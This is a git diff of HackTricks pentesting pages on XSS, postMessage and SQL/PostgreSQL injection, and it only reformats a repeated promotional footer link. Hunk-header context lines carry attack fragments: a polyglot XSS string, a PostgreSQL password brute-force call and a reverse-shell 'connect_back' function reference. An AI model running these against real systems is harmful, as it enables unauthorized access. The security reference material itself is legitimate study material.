group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md b/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md index 0ef05f1a2..ccab52553 100644 --- a/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md +++ b/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -59,7 +59,7 @@ javascript:"/*'/*`/*--> diff --git a/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md b/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md index 9d4866037..f3bacafd8 100644 --- a/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md +++ b/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -48,7 +48,7 @@ And in order to be precise and **send** that **postmessage** just **after** the * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md b/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md index f8764556b..3acc82142 100644 --- a/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md +++ b/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -90,7 +90,7 @@ That **payload** will get the **identifier** and send a **XSS** it **back to the * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md b/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md index 4fec2a374..e6e9e841c 100644 --- a/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md +++ b/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -89,7 +89,7 @@ The final solution by [**@terjanq**](https://twitter.com/terjanq) is the [**foll * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md b/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md index b7d6d2485..b448f1558 100644 --- a/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md +++ b/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -44,7 +44,7 @@ This is specially useful in **postMessages** because if a page is sending sensit * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/sql-injection/README.md b/pentesting-web/sql-injection/README.md index 26d8e752f..733cb9888 100644 --- a/pentesting-web/sql-injection/README.md +++ b/pentesting-web/sql-injection/README.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -594,7 +594,7 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/sql-injection/cypher-injection-neo4j.md b/pentesting-web/sql-injection/cypher-injection-neo4j.md index cede7423c..7e5bfa19a 100644 --- a/pentesting-web/sql-injection/cypher-injection-neo4j.md +++ b/pentesting-web/sql-injection/cypher-injection-neo4j.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -24,7 +24,7 @@ Check the following blogs: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/sql-injection/mysql-injection/README.md b/pentesting-web/sql-injection/mysql-injection/README.md index 99991ddb5..f846cb10e 100644 --- a/pentesting-web/sql-injection/mysql-injection/README.md +++ b/pentesting-web/sql-injection/mysql-injection/README.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -198,7 +198,7 @@ mysql> select version(); * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md b/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md index 5e4a2c8fa..63a2d6e0e 100644 --- a/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md +++ b/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -135,7 +135,7 @@ select brute_force('127.0.0.1', '5432', 'postgres', 'postgres'); * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md index 230c9466e..e1ec010c5 100644 --- a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md +++ b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -367,7 +367,7 @@ print(" drop function connect_back(text, integer);") * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md index 1b02f12d8..48797c2ef 100644 --- a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md +++ b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud 